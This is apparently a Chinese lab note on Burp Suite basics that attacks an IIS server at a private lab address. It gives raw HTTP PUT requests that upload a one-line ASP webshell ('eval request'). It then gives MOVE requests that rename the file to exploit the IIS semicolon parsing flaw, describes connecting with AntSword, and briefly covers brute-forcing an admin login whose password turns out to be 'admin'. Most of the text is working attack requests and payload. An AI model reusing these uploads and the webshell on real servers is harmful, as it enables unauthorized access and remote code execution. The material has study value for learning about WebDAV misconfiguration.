Burp、awvs基础
1.开启webdav利用iis写入权限
开启文件的脚本权限,读写权限
2、利用burp抓包上传木马
http请求方法:
GET、POST、PUT(上传)、MOVE(移动、重命名)、COPY(复制)、DELETE(删除)、LOCK(锁)
抓包
利用PUT上传木马文件
<%eval request(“123”)%>
PUT /abc1.txt http/1.1
HOST:192.168.8.129
11111111111111111111111111111
<%eval request(“123”)%>
利用MOVE对上传文件后缀进行重写
1、利用iis解析漏洞
将abc1.txt转移(重命名)abc1.asp;1.txt
MOVE /abc1.txt http/1.1
Host: 192.168.8.129
Destination: http://192.168.8.129/abc1.asp;1.txt
111111111111111111111111111111111111111
<%eval request(“123”)%>
解析 http://192.168.8.129/abc1.asp;1.txt
用蚁剑对其进行连接
2、利用脚本解析
利用PUT重新上传木马文件abc2.txt
利用MOEV重命名abc2.txt->abc2.asp
MOVE /abc2.txt http/1.1
Host: 192.168.8.129
Destination: http://192.168.8.129/abc2.asp
22222222222222222222222222222222
<%eval request(“123”)%>
蚁剑连接
3、利用burp对网站后台和后台密码进行爆破
1、对网站进行后台爆破
访问http://192.168.8.129/admin/admin
出现错误
访问http:192.168.8.129/admin/login.asp成功
2、对网站后台进行爆破
爆破得到密码为admin